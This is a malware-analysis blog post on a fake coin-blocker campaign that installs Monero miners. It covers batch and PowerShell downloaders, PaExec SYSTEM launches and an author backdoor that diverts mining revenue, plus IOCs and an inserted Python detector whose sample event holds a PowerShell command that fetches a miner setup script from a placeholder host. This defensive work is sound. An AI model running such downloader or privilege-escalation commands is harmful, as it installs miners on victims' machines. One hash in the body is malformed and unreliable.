Coinminer malware has been on the rise for some time. As more and more users become aware of this threat and try to take measures to protect themselves, cybercriminals attempt to cash in on that fear by serving cryptominer malware from a website that claims to offer a coin-blocker tool. Although the website is unprofessional and looks suspicious for the most part, many non-tech-savvy users may still be taken in by it.

Figure 1. Source website

We have observed two variants of this malware strain served by the website mentioned above and by coin-blocker[.]com. In both cases, the malware operator uses off-the-shelf miner code written by another author for his own financial gain, and in the process is himself being cheated.

CryptoMiner Variant #1

MD5s: 927adcebfa52b3551bdd008b42033a6e and c777e949686f49cc0a03d0d03c5e68a

The first malware variant was downloaded with file names such as "cr_blocker_v12.exe" and "apollo.exe" and makes extensive use of batch files. First, a batch file is dropped and executed; it then runs a PowerShell command (a slightly modified version of the PowerShell script from http://moneroocean[.]stream) to download and run a batch script (another copy of MoneroOcean's xmrig_setup.bat) from the same website. The purpose of the final batch script is to download, configure and run the miner on the infected system.

Figure 2. Execution flow and batch files executed by the malware

The script above comes from a script published on the MoneroOcean GitHub account, with two minor changes. The malware author modified the DownloadFile URL to point to a copy of the official miner batch file hosted on the malware site. The second and obvious change is the wallet address to which the attacker collects the revenue from this mining campaign. The address has not earned much yet (as of August 16, 2018, only 1.298239 XMR has been paid out), but this campaign has only just begun, so it is too early to draw conclusions.

CryptoMiner Variant #2

MD5s: d3fa184981b21e46f81da37f7c2cf41e

The second malware variant was seen downloaded with the file name start_me_now.exe, which in turn downloads another file named start_me.exe from the same domain and executes it. The downloaded file is an SFX archive containing multiple files, including the xmr-stak and xmrig miners with the same configuration.

Image: Flowchart of the Cryptominer SFX variant

The malware operator used a version of Playerz Multi Hidden Cryptocurrency Miner from multicryptominer[.]com with the addition of silent.exe, which contains an embedded copy of the xmrig miner. Silent.exe runs the xmrig miner by injecting it into a process such as notepad.exe.

Figure 3. SFX script from start_me.exe

In this case the batch files are single-line scripts, as shown below: run.bat runs C:\ProgramData\playersclub\player.exe, and share.bat opens xmrminingpro[.]com/share.html in an attempt to convince the user to share this website on social media sites (Twitter, Facebook and Google Plus), resulting in further infections.

Figure 4. Batch file

Setup.exe and all the other files that are part of this SFX archive belong to Playerz Multi Hidden Cryptocurrency Miner, details of which follow.

Playerz Multi Hidden Cryptocurrency Miner

setup.exe

The SFX script runs setup.exe, which copies the "pcdata" folder and its files to C:\ProgramData\playersclub and runs installer.exe.

Figure 5. AutoHotkey script from setup.exe

installer.exe

Installer.exe registers and runs xmr-stak as a service using launchserv.exe, allowing it to run with higher privileges, and also creates C:\ProgramData\playersclub\player.txt using the configuration data taken from playerconfig.txt:

Figure 6. AutoHotkey script from installer.exe

Launchserv.exe uses the following configuration to register the service:

Figure 7. LaunchServ.ini file

systemSpawn.exe

systemSpawn.exe is registered as a service for the purpose of making sure that player.exe exists in the C:\ProgramData\playersclub directory, downloading it if it is missing, and running it with escalated privileges using PaExec.exe (similar to Microsoft's PsExec tool) from poweradmin[.]com/paexec/.

Figure 8. AutoHotkey script from systemSpawn.exe

It runs player.exe with the following PaExec options to obtain escalated privileges:

-s (run the process in the SYSTEM account)
-x (display the user interface on the Winlogon secure desktop)
-d (do not wait for the process to finish [non-interactive])
-i (run the program so that it interacts with the desktop of the specified session on the specified system; if no session is specified, the process runs in the console session)

player.exe

Player.exe is the main process responsible for managing the xmr-stak.exe process. It does everything the malware author advertises on the website, such as: run when the computer is idle; check whether video or audio is playing; automatically download and, if necessary, update the miner software; kill all the processes listed in ProcessesList.txt; and more. Ironically, the author of Playerz Multi Hidden Cryptocurrency Miner has provided a wallet address for donations to help fund the development of this malware.

Figure 9. Donation address mentioned on the website

But that was not enough: the author also added a backdoor feature to the multicryptominer binary that mines cryptocurrency to the author's own address. It checks the modification timestamp of player.txt and, if that file is more than five days old, fetches the latest configuration from multicryptominer[.]com/pool2.xml.

Figure 10. Downloading the latest configuration from the C&C

It parses the received data as shown below:

Figure 11. Parsing of the C&C response
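The persistence and privilege-escalation chain described above (player.exe living under C:\ProgramData\playersclub, systemSpawn.exe launching it through PaExec with -s -x -d -i, xmr-stak registered as a service via launchserv.exe) and the Variant #1 PowerShell downloader all leave traces in ordinary process-creation telemetry. The Python script below is an added example written for this page, not Zscaler's code or the malware's: it runs a few constructed Sysmon-style key=value process-creation lines through simple rules keyed on those behaviours. The log format, the field names (Image, CommandLine, ParentImage), the sample lines and the placeholder download URL are assumptions made for the example.

```python
"""Added example (not from the Zscaler write-up): flag process-creation events
that match the Playerz Multi Hidden Cryptocurrency Miner chain described above.
Log format, field names and sample lines are assumptions for this example."""
import re
from typing import Dict, List, Tuple

# Constructed sample events in a simplified key=value process-creation format
# (quoted values may contain spaces). Only events 0-2 model the malware chain.
SAMPLE_EVENTS = [
    # systemSpawn.exe launching player.exe as SYSTEM through PaExec
    'Image=C:\\ProgramData\\playersclub\\paexec.exe '
    'CommandLine="paexec.exe -s -x -d -i C:\\ProgramData\\playersclub\\player.exe" '
    'ParentImage=C:\\ProgramData\\playersclub\\systemspawn.exe',
    # installer.exe registering xmr-stak as a service via launchserv.exe
    'Image=C:\\ProgramData\\playersclub\\launchserv.exe '
    'CommandLine="launchserv.exe LaunchServ.ini" '
    'ParentImage=C:\\ProgramData\\playersclub\\installer.exe',
    # Variant #1 batch file: PowerShell fetching xmrig_setup.bat (URL is a placeholder)
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell.exe -w hidden (New-Object Net.WebClient).DownloadFile'
    "('http://malware-site.invalid/xmrig_setup.bat','%TEMP%\\xmrig_setup.bat')\" "
    'ParentImage=C:\\Windows\\System32\\cmd.exe',
    # benign noise
    'Image="C:\\Program Files\\Mozilla Firefox\\firefox.exe" CommandLine="firefox.exe" '
    'ParentImage=C:\\Windows\\explorer.exe',
    'Image=C:\\Windows\\System32\\notepad.exe '
    'CommandLine="notepad.exe C:\\Users\\alice\\notes.txt" '
    'ParentImage=C:\\Windows\\explorer.exe',
]

# key=value pairs; a value is either double-quoted (may contain spaces) or a bare token
_FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# (rule name, field to inspect, compiled pattern). Case-insensitive because
# Windows paths and command lines are.
RULES = [
    # anything executing out of the SFX drop directory
    ("playersclub_drop_dir", "Image",
     re.compile(r"\\programdata\\playersclub\\", re.I)),
    # PaExec with the exact switch set the write-up describes (-s -x -d -i, any order)
    ("paexec_system_launch", "CommandLine",
     re.compile(r"\bpaexec(?:\.exe)?\b(?=.*\s-s\b)(?=.*\s-x\b)(?=.*\s-d\b)(?=.*\s-i\b)", re.I)),
    # xmr-stak being registered as a service through launchserv.exe
    ("launchserv_service_install", "Image",
     re.compile(r"\\launchserv\.exe$", re.I)),
    # PowerShell DownloadFile pulling the MoneroOcean setup batch file
    ("powershell_xmrig_setup_download", "CommandLine",
     re.compile(r"downloadfile.*xmrig_setup\.bat", re.I)),
]


def parse_event(line: str) -> Dict[str, str]:
    """Parse one key=value event line into a dict; quoted values keep their spaces."""
    return {m.group(1): (m.group(2) if m.group(2) is not None else m.group(3))
            for m in _FIELD.finditer(line)}


def match_rules(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules whose pattern matches the event's field, in rule order."""
    return [name for name, field, pattern in RULES
            if pattern.search(event.get(field, ""))]


def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Run every line through the rules; return (line index, matched rules) for hits only."""
    hits = []
    for idx, line in enumerate(lines):
        matched = match_rules(parse_event(line))
        if matched:
            hits.append((idx, matched))
    return hits


if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(names)}")
```

The drop-directory rule is the cheapest and broadest signal, since every component of the SFX chain (setup.exe, installer.exe, systemSpawn.exe, player.exe, launchserv.exe) runs from the same folder; the PaExec rule is the most specific, because the -s -x -d -i combination launched from a non-administrative tool is unusual outside of this kind of tooling. The benign firefox.exe and notepad.exe lines produce no hits.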
Figure 11. Configuration received from the server

It then calculates the mining time to be allotted on the infected system to the original author's address and to the second-level malware operator's address:

Figure 12. Calculation of the mining time split between the author's and the customer's addresses

If the server does not respond with a valid configuration, or player.txt is not more than five days old, it runs the miner for the second-level malware operator's address for 105 minutes and for the author's address for 15 minutes; otherwise, it splits the time between the mining addresses based on a value received from the server. At the time of analysis, the server sent the maximum possible value of nine, which splits the mining time between author and customer in a 3 to 1 ratio (90 minutes for the author and 30 minutes for the customer).

After downloading the backdoor configuration and computing the time split, it starts timers for various activities:

Figure 13. Timers for starting and stopping the mining process

When the execution conditions are met (for example, when the system is idle and no video or audio is playing), it runs the miner using runProcesses.exe. This also ensures that the end user does not notice any obvious slowdown of the system caused by the mining operation.

Figure 14. Running the miner processes using runProcesses.exe

It also starts a timer whose callback terminates the process after the timeout.

runProcesses.exe

This tries to detect the CPU and graphics card in order to run the miner with optimal settings and, in case no configuration is downloaded from the C&C, it also includes hardcoded wallet addresses for mining.

Figure 15. Hardcoded addresses used if no configuration is received from the server

Conclusion

There is a growing trend of new cryptominer malware families, and of existing malware families adding cryptomining support, as outlined in our previous write-up.

The AntiCoinMiner malware operator is taking advantage of tried and tested scareware tactics, very similar to the FakeAV malware families, providing a false sense of security to the end user while using the machine for financial gain. The malware operator uses off-the-shelf cryptominer malware for this campaign; however, the author of the original cryptominer malware has backdoor functionality embedded in the code that cheats the second-level malware operator by diverting most of the CPU cycles of the infected machines to mine coins for the original author.

Zscaler ThreatLabZ is actively monitoring threats like these and will continue to provide coverage for Zscaler customers.

IOCs

MD5s:
927adcebfa52b3551bdd008b42033a6e
d3fa184981b21e46f81da37f7c2cf41e
c777e949686f49cc0a03d0d374c5e68a
ecd13814885f698d58b41511791339b6
642cccf03f9493b3d91d84e1b0e55e9c
da8d0c73863afe801bb8937c4445f5f9
d3fa184981b21e46f81da37f7c2cf41e
e6569c2c9bceb6a5331d39a897e99152
06ded4e24118a4baccfd2f93fffe3506
927adcebfa52b3551bdd008b42033a6e
f8df9d2adf5b92dc4dd419098d444bde
b0cec3e582a03c978eaff9a8d01f3c31
d204728ac2e98ac380953deb72d3ca57
c842a49268b52892268e3ff03205b2de
95ea8c948a5254a3b24cbbf3edec1a1a

URLs:
www.xmrminingpro[.]com/start_me_now.exe
xmrminingpro[.]com/cr_blocker_v12.exe
xmrminingpro[.]com/Crypto_Blocker_.BAT.exe
coin-blocker[.]com/Coin_Blocker_v1.55.exe
xmrminingpro[.]com/Apollo
coin-blocker[.]com/Coin_Blocker_v1.5.exe
coin-blocker[.]com/vecchio/apollo_stream.exe
coin-blocker[.]com/apollo/apollo_x86.exe

Wallet addresses:

From the samples:
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQsjqdY9cck94oTET4i
48LYTsUuFis3eheaGJSVC1b4DiftHw8249KCELDPGLU7Ke7GddfV7vM8qmuoW3x3qy8hPXiEknM2jixquq4qbHYHHmWut4J
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQrzvo2Dv3ebJHC95XG
4BEqL8aYcuydaT26Rm9BBDgx5MAPeMSeJGgMd8RJDQKaPZEVySfAaTU8bVMsp2uykJZJ1aJDtyLRHREUBe1XXjfUAty7XJy
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQrzvo2Dv3ebJHC95XG
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQmRkHZngZS7So7FipR

Author's addresses:
Hardcoded: 472dyZhom95Higc85N5E1LbiY3kgbQvapcZ1DosRfjKX4EAvK3ZrdvuLxLMe4vTFbEUAhECZoDZHyGMdFJktrZZyNA3v1Wr
Received from the C&C: 48LYTsUuFis3eheaGJSVC1b4DiftHw8249KCELDPGLU7Ke7GddfV7vM8qmuoW3x3qy8hPXiEknM2jixquq4qbHYHHmWut4J
Mentioned for donations: 48YAdSiCmzSPXxbrqjhnkVNLfFwcX6uJvV6wVGxNdDZ1Fww43c6zdjo1HePWZY6KXp78q8kv5rcqFYM76uSpPv8u4E2pnuq
*** This is a Security Bloggers Network syndicated blog from the Zscaler research blog authored by [email protected]. Read the original post at https://www.zscaler.com/blogs/research/anticoinminer-mining-campaign